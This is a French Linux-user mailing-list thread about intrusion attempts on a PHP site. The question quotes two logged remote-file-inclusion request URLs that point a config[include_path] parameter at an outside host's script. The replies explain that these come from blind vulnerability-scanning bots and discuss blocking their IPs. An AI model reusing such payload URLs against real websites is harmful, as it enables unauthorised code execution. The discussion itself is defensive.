En gros tu blacklists l'ip pendant quelques heures ?
Le 02/04/08, neofutur<[EMAIL PROTECTED]> a écrit :
> oui, ce sont des robots de recherche de failles, des requetes de ce
> genre j'en ai des milliers chaque jour sur mes serveurs, au point que
> generalement il y a plus de charge en provenance des robotsd qu'en
> provenance des visiteurs reels.
>
> En general ces robots testent des failles connues pour un cms (
> joomla, phpbb . .. . ) mais en aveugle, ils cherchent la faille sur
> tous les sites du web sans chercher a savoir si le site web possede le
> logiciel concerne par la faille.
> D'une maniere generale tu ne risque rien.si ton site web n'utilise
> pas le logiciel concerne par la faille recherchée, le seul vrai risque
> est pour l'hebergeur de ton site qui, s'il heberge des dizaines de
> sites web sur un meme serveur, risque d'etre surcharge par des
> dizaines de requetes de ce genre a la minute.
> Sur certains de mes serveurs j'ai du en arriver a creer des
> expressions regulieres qui detectent dce genre de requetres bidon pour
> ensuite dropper reguilierement les adresses ips utilisees par ces
> robots, sans quoi ils generent tellement de charge sur le serveur que
> les sites peuvent etre injoignables pour les vrais utilisateurs.
>
> Le 02/04/08, Yann Cochard<[EMAIL PROTECTED]> a écrit :
>
> > Bonjour,
> >
> > Sur mon site en PHP, je repère des tentatives d'intrusion / prise de
> > contrôle / récupération de données sensibles. Elles n'ont pas l'air
> > efficaces (c'est pour ça que j'en ai connaissance d'ailleurs : j'ai un
> > log d'erreur), et se font par massage de paramètres.
> > Exemple :
> >
> http://monsite/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt?
> > ou même :
> >
> http://monsite/mapage.html/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt?
> > Comme je n'ai pas de page config_settings.php et que mes pages ne
> > prennent pas les paramètres de cette manière, ça ne marche pas... o_O
> > Pour voir le contenu du script que l'attaquant essaie de faire
> > tourner, voyez ce fichier texte :
> > http://www.health-nutrition-business.com/echo.txt
> >
> > La question que je me pose : ces attaques sont-elles conçus pour des
> > programmes PHP connus (par exemple phpBB), ou bien peuvent-elles
> > fonctionner sur du code maison ?
> > Comment s'en prémunir ?
> >
> > Merci
> > Yann
> >
> > --
> > _________________________________________________________________
> > Kaella, distribution Linux live-cd : http://kaella.linux-azur.org
> >
> > Diffusez cette liste aupres de vos relations :)
> > Linux Azur : http://linux-azur.org
> > L'auteur du post est responsable de ses écrits !
> > *** Pas de message SMS, HTML ni de PJ SVP ***
> >
>
>
>
> --
> Cordialement
>
> William Waisse
> http://waisse.org | http://neoskills.com
> http://cahierspip.ww7.be | http://feeder.ww7.be
>
> carte de visite : http://xena.ww7.be/my_carte2.jpg
>
>
> Diffusez cette liste aupres de vos relations :)
> Linux Azur : http://linux-azur.org
> L'auteur du post est responsable de ses écrits !
> *** Pas de message SMS, HTML ni de PJ SVP ***
>
Diffusez cette liste aupres de vos relations :)
Linux Azur : http://linux-azur.org
L'auteur du post est responsable de ses écrits !
*** Pas de message SMS, HTML ni de PJ SVP ***